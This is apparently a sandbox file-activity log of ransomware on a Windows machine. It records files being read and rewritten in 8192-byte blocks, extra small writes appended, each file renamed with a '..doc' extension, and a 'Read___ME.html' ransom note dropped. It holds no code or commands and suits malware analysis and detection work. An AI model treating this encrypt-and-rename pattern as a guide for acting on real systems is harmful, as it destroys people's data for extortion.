File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, size = 8192	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\EDBres00002.jrs..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\TileDataLayer\Database\vedatamodel.edb, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = System Paging File, size = 128	1	Fn
File	Write	filename = System Paging File, size = 768	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, type = size, size_out = 112	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 8192, size_out = 112	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 112	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\AdobeARM.log..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, type = size, size_out = 71559	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 8192, size_out = 6023	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 6032	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\W8nb..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, type = size, size_out = 11264	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\System.dll..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\nss8BF6.tmp\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 128	1	Fn Data
